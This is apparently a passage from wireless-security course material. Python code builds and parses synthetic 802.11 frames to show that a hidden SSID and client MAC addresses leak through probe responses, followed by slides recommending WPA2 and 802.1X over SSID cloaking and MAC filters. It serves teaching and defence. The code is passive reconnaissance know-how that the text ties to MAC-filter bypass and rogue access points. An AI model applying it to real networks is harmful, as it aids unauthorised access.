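# Frame Control byte 0: bits 0-1 version, bits 2-3 type (00 = management), bits 4-7 subtype.
SUBTYPE_NAMES = {0x80: "beacon", 0x50: "probe-response", 0x40: "probe-request",
                 0xC0: "deauthentication", 0xA0: "disassociation"}
SSID_ELEMENT_ID = 0
MGMT_HEADER_LEN = 24          # FC(2) duration(2) addr1(6) addr2(6) addr3(6) seq(2)
BEACON_FIXED_LEN = 12         # timestamp(8) beacon interval(2) capability(2)


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype_byte: int, da: bytes, sa: bytes, bssid: bytes,
                     ssid: str | None) -> bytes:
    """Construct a beacon or probe response: header, fixed fields, then the SSID element.
    A cloaked beacon carries a zero-length SSID element (pass ssid=None)."""
    header = bytes([subtype_byte, 0x00]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00"
    fixed = struct.pack("<QHH", 0, 100, 0x0411)  # constructed timestamp/interval/capability
    ssid_bytes = b"" if ssid is None else ssid.encode()
    element = bytes([SSID_ELEMENT_ID, len(ssid_bytes)]) + ssid_bytes
    return header + fixed + element


def parse_mgmt_frame(frame: bytes) -> dict:
    """Every field returned here travels in cleartext: anyone in RF range can read it."""
    if len(frame) < MGMT_HEADER_LEN:
        raise ValueError("truncated 802.11 header")
    fc0 = frame[0]
    if fc0 & 0x0C != 0x00:                      # type bits must be 00 (management)
        raise ValueError("not a management frame")
    info = {"subtype": SUBTYPE_NAMES.get(fc0, f"0x{fc0:02x}"),
            "da": mac_str(frame[4:10]), "sa": mac_str(frame[10:16]),
            "bssid": mac_str(frame[16:22]), "ssid": None}
    if fc0 in (0x80, 0x50):                     # beacon / probe response carry the SSID element
        body = frame[MGMT_HEADER_LEN + BEACON_FIXED_LEN:]
        while len(body) >= 2:
            eid, elen = body[0], body[1]
            value, body = body[2:2 + elen], body[2 + elen:]
            if eid == SSID_ELEMENT_ID:
                info["ssid"] = value.decode(errors="replace")
                break
    return info


def observe_cloaked_network() -> dict:
    """What a passive sniffer learns from a hidden-SSID network over time."""
    ap = bytes.fromhex("001122334455")          # constructed AP address
    client = bytes.fromhex("66778899aabb")      # constructed client address
    broadcast = b"\xff" * 6
    beacon = build_mgmt_frame(0x80, broadcast, ap, ap, None)        # cloaked beacon
    probe_resp = build_mgmt_frame(0x50, client, ap, ap, "CorpNet")  # unicast, SSID present
    seen = [parse_mgmt_frame(beacon), parse_mgmt_frame(probe_resp)]
    return {"beacon_ssid": seen[0]["ssid"],
            "probe_response_ssid": seen[1]["ssid"],
            "client_macs_visible": sorted({f["da"] for f in seen} - {mac_str(broadcast)})}


if __name__ == "__main__":
    print(observe_cloaked_network())
```

The cloaked beacon yields an empty SSID, but the moment a legitimate client probes and associates, the probe response reveals "CorpNet" and the client's MAC address appears as the destination, which is all a MAC-filter bypass or a rogue AP with the same SSID needs.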


Summary
• Standards organizations exist to improve wireless
network security.
• IEEE 802.11 security has matured to include more
robust authentication and encryption methods, such
as those used with WPA2:
• Supports both CCMP/AES and TKIP/ARC4 dynamic
encryption-key generation methods.
• 802.1X/EAP authentication is required in the enterprise and
passphrase or pre-shared key authentication in a SOHO
environment.
• Knowing the history of IEEE 802.11 security helps us
better understand and improve upon current WLAN
security issues.
(Coleman et al., 2016a, 2016b)
Summary (Cont.)
• Legacy security methods like WEP, Open System
Authentication, and Shared Key Authentication
should not be part of any new network plan.

• VPNs, MAC Filters, SSID Segmentation, and SSID


Cloaking/Hiding should not be used as enterprise
security solutions for 802.11 WLANs.
• WPA2 methods such as CCMP/AES encryption and
802.1X/EAP authentication using a RADIUS server should
be considered instead.

(Coleman et al., 2016a, 2016b)


References
Bartz, R. (2017). Wireless Local Area Networking, Standards, and Certifications. In CWTS, CWS, and CWT Complete Study Guide (pp. 35-76). Indianapolis, IN: Wiley.

Cisco. (n.d.). 802.11 Association process explained. Retrieved from https://documentation.meraki.com/MR/WiFi_Basics_and_Best_Practices/802.11_Association_process_explained

Coleman, D. D., Westcott, D. A., & Harkins, B. (2016a). Legacy 802.11 Security. In CWSP: Certified Wireless Security Professional Study Guide (2nd ed., pp. 29-60). Indianapolis, IN: Wiley.

Coleman, D. D., Westcott, D. A., & Harkins, B. (2016b). WLAN Security Overview. In CWSP: Certified Wireless Security Professional Study Guide (2nd ed., pp. 1-28). Indianapolis, IN: Wiley.